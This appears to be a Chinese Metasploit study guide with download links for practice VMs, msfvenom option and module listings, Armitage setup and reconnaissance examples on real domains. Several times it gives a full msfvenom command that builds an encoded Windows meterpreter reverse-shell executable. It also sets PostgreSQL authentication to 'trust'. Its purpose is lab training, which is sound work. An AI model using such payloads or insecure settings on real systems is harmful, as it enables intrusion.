Windows 2000 Professional
链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm
提取码:upsm
Windows Server 2003 Standard x64 Edition
链接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb
提取码:ngsb
Windows 7 x64
链接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o
提取码:zp3o
Debian 6(Kali Linux)
链接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5
提取码:s2i5
安装了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全测试练习教案
cd /usr/local/apache-tomcat-8.5.81/bin
./startup.sh
service mysql start
打开浏览器输入127.0.0.1:8080/sec/
Metasploitable2-Linux (with vsftpd 2.3.4)
链接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6
提取码:17g6
解压后直接为vmx文件,直接可用
基本概念
通讯协议
ARP
ICMP
TCP
专业术语
渗透攻击(Exploit)
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
攻击载荷(Payload)
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是能在目标机器上执行有限命令的程序。
Shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可执行命令的shell
模块(Module)
MSF 的模块,由一系列代码组成。
监听器(Listener)
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。
编码器(encoders)
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
Metasploit用户接口
MSF终端
#msfconsole
msf6>help connect
MSF命令行
#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run
#msfconsole -r path/xxx.rc
Armitage
安装
下载Armitage:https://gitlab.com/kalilinux/packages/armitage
解压armitage
#cd armitage #./package.sh # cd release #ll drwxr-xr-x 2 root root 4096 6月 29 18:40 unix drwxr-xr-x 2 root root 4096 6月 29 18:40 windows #cd /etc/postgresql/14/main/ #gedit pg_hba.conf |
注释掉所有
# "local" is for Unix domain socket connections only local all all trust # IPv4 local connections: host all all 127.0.0.1/32 trust # IPv6 local connections: host all all ::1/128 trust |
# service postgresql stop # msfdb reinit #service postgresql start #cd /home/jerry/下载/armitage-kali-master/release/unix # ./armitage | |
|
|
产生被控端与主控端
扫描
Metasploit功能程序
MSF攻击荷载生成器
编写语言 | 输出语言 |
Python | C |
Web 语言 | JavaScript |
# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exe
Options:
参数 | 内容 | 解析 |
-l | --list |
| 列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式、所有 |
-p | --payload |
| 要使用的有效负载(-list payloads to list,--list options for arguments)。为自定义指定“-”或STDIN |
| --list-options |
| 列表--有效载荷的标准、高级和规避选项 |
-f | --format |
| 输出格式(使用--要列出的列表格式) |
-e | --encoder |
| 要使用的编码器(使用--列出要列出的编码器) |
| --service-name |
| 生成服务二进制文件时要使用的服务名称 |
| --sec-name |
| 生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串 |
| --smallest |
| 使用所有可用编码器生成尽可能最小的有效负载 |
| --encrypt |
| 要应用于外壳代码的加密或编码类型(使用--list encrypt to list) |
| --encrypt-key |
| 用于加密的密钥 |
| --encrypt-iv |
| 用于–encrypt的初始化向量 |
-a | --arch |
| 用于--有效负载和--编码器的体系结构(使用--列出要列出的ARCH) |
| --platform |
| 用于--有效负载的平台(使用--列出要列出的平台) |
-o | --out |
| 将有效负载保存到文件 |
-b | --bad-chars |
| 要避免的字符示例:“\\x00\\xff” |
-n | --nopsled |
| 将[长度]大小的NOSLED预先添加到有效负载上 |
| --pad-nops |
| 使用-n指定的nopled size作为总有效负载大小,自动在nopled前面加上数量(nops减去有效负载长度) |
-s | --space |
| 产生的有效负载的最大大小 |
| --encoder-space |
| 编码有效负载的最大大小(默认为-s值) |
-i | --iterations |
| 对有效负载进行编码的次数 |
-c | --add-code |
| 指定要包含的其他win32外壳代码文件 |
-x | --template |
| 指定要用作模板的自定义可执行文件 |
-k | --keep |
| 保留--template行为并将负载作为新线程注入 |
-v | --var-name |
| 指定用于特定输出格式的自定义变量名称 |
-t | --timeout |
| 从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用) |
-h | --help |
| 显示此消息 |
MSF编码器
# msfvenom -l encoders
Framework Encoders [--encoder]
Name | Rank | Description |
cmd/brace | low | Bash Brace Expansion Command Encoder |
cmd/echo | good | Echo Command Encoder |
cmd/generic_sh | manual | Generic Shell Variable Substitution Command Encoder |
cmd/ifs | low | Bourne ${IFS} Substitution Command Encoder |
cmd/perl | normal | Perl Command Encoder |
cmd/powershell_base64 | excellent | Powershell Base64 Command Encoder |
cmd/printf_php_mq | manual | printf(1) via PHP magic_quotes Utility Command Encoder |
generic/eicar | manual | The EICAR Encoder |
generic/none | normal | The "none" Encoder |
mipsbe/byte_xori | normal | Byte XORi Encoder |
mipsbe/longxor | normal | XOR Encoder |
mipsle/byte_xori | normal | Byte XORi Encoder |
mipsle/longxor | normal | XOR Encoder |
php/base64 | great | PHP Base64 Encoder |
ppc/longxor | normal | PPC LongXOR Encoder |
ppc/longxor_tag | normal | PPC LongXOR Encoder |
ruby/base64 | great | Ruby Base64 Encoder |
sparc/longxor_tag | normal | SPARC DWORD XOR Encoder |
x64/xor | normal | XOR Encoder |
x64/xor_context | normal | Hostname-based Context Keyed Payload Encoder |
x64/xor_dynamic | normal | Dynamic key XOR Encoder |
x64/zutto_dekiru | manual | Zutto Dekiru |
x86/add_sub | manual | Add/Sub Encoder |
x86/alpha_mixed | low | Alpha2 Alphanumeric Mixedcase Encoder |
x86/alpha_upper | low | Alpha2 Alphanumeric Uppercase Encoder |
x86/avoid_underscore_tolower | manual | Avoid underscore/tolower |
x86/avoid_utf8_tolower | manual | Avoid UTF8/tolower |
x86/bloxor | manual | BloXor - A Metamorphic Block Based XOR Encoder |
x86/bmp_polyglot | manual | BMP Polyglot |
x86/call4_dword_xor | normal | Call+4 Dword XOR Encoder |
x86/context_cpuid | manual | CPUID-based Context Keyed Payload Encoder |
x86/context_stat | manual | stat(2)-based Context Keyed Payload Encoder |
x86/context_time | manual | time(2)-based Context Keyed Payload Encoder |
x86/countdown | normal | Single-byte XOR Countdown Encoder |
x86/fnstenv_mov | normal | Variable-length Fnstenv/mov Dword XOR Encoder |
x86/jmp_call_additive | normal | Jump/Call XOR Additive Feedback Encoder |
x86/nonalpha | low | Non-Alpha Encoder |
x86/nonupper | low | Non-Upper Encoder |
x86/opt_sub | manual | Sub Encoder (optimised) |
x86/service | manual | Register Service |
x86/shikata_ga_nai | excellent | Polymorphic XOR Additive Feedback Encoder |
x86/single_static_bit | manual | Single Static Bit |
x86/unicode_mixed | manual | Alpha2 Alphanumeric Unicode Mixedcase Encoder |
x86/unicode_upper | manual | Alpha2 Alphanumeric Unicode Uppercase Encoder |
x86/xor_dynamic | normal | Dynamic key XOR Encoder |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF攻击载荷
MSF NOP
# msfvenom -l nops
Framework NOPs (11 total)
========================= Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
cmd/generic Generates harmless padding for command payloads.
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator MSF平台
MSF平台
# msfvenom -l platforms
Framework Platforms [--platform]
========================================
Name
----
aix
android
apple_ios
arista
brocade
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
mikrotik
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF有效负载和--编码器的体系结构
# msfvenom -l archs
Framework Architectures [--arch]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF应用于外壳代码的加密或编码类型
# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
Name
----
aes256
base64
rc4
xor
MSF文件格式
# msfvenom -l formats
msfvenom -l formats
Framework Executable Formats [--format]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
查看配置
# msfvenom -p moduleName --list-options
比如:
msfvenom -p windows/shell_reverse_tcp --list-options
Nasm shell
Netwide Assembler (简称 NASM)是一款基于x86架构的汇编与反汇编软件。它可以用来编写16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被认为是Linux平台上最受欢迎的汇编工具之一。
NASM 最初是在朱利安·霍尔(Julian Hall)的协助下由西蒙·泰瑟姆(Simon Tatham)开发的。截至2016年,它被一个由Hans Peter Anvin领导的小团队所维护。 它是一款基于简化版BSD许可证(2-clause BSD License)的开放源代码软件。
cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >
Metasploit Express & Metasploit Pro
信息收集
被动信息搜索
Whois
格式
msf > whois example.com
msf> whois 192.168.1.100
例子
msf6 > whois 3testing.com
[*] exec: whois 3testing.com
Domain Name: 3TESTING.COM
Registry Domain ID: 513017975_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-06-27T15:41:17Z
Creation Date: 2006-07-09T13:24:36Z
Registry Expiry Date: 2023-07-09T13:24:36Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
% [whois.apnic.net]
% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html
% Information related to '123.56.0.0 - 123.57.255.255'
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country:CN
admin-c:ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c:AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt:IRT-CNNIC-CN
last-modified: 2021-06-16T01:25:33Z
source: APNIC
irt:IRT-CNNIC-CN
address:Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks:Please note that CNNIC is not an ISP and is not
remarks:empowered to investigate complaints of network abuse.
remarks:Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
role: ABUSE CNNICCN
address:Beijing, China
country:ZZ
phone: +000000000
e-mail: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
nic-hdl:AC1601-AP
remarks:Generated from irt object IRT-CNNIC-CN
abuse-mailbox: ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified: 2020-05-14T11:19:01Z
source: APNIC
person: Li Jia
address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou
country:CN
phone: +86-0571-85022088
e-mail: jiali.jl@alibaba-inc.com
nic-hdl:ZM1015-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T02:02:01Z
source: APNIC
person: Guoxin Gao
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022600
fax-no: +86-0571-85022600
e-mail: anti-spam@list.alibaba-inc.com
nic-hdl:ZM875-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T01:56:01Z
source: APNIC
person: security trouble
e-mail: yitian.gaoyt@alibaba-inc.com
address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road
address:Hangzhou, Zhejiang, China
phone: +86-0571-85022600
country:CN
mnt-by: MAINT-CNNIC-AP
nic-hdl:ZM876-AP
last-modified: 2021-04-13T23:22:33Z
source: APNIC
person: Guowei Pan
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022088-30763
fax-no: +86-0571-85022600
e-mail: guowei.pangw@alibaba-inc.com
nic-hdl:ZM877-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2013-07-09T01:34:02Z
source: APNIC
% Information related to '123.56.128.0/19AS4837'
route: 123.56.128.0/19
descr: CNC Group CHINA169 Fujian Province Network
descr: Addresses from APNIC(YJZXNET)
country:CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
last-modified: 2008-09-04T07:55:26Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)
netcraft
https://www.netcraft.com/
https://searchdns.netcraft.com/
Maltego
sn0int
安装
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc
# echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
#sn0int
[sn0int][default] > pkg quickstart
使用
[sn0int][default] > workspace demo
[+] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com" : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com" : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com" : Adding subdomain "foundation.baidu.com"
[*] "baidu.com" : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com" : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "duke.baidu.com"
[*] "baidu.com" : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com" : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com" : Adding subdomain "trafficsafe.baidu.com"
ZoomEye
nslookup
msf6 > nslookup
set type=mx
example.com
例子
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 8.8.8.8
Address:8.8.8.8#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186
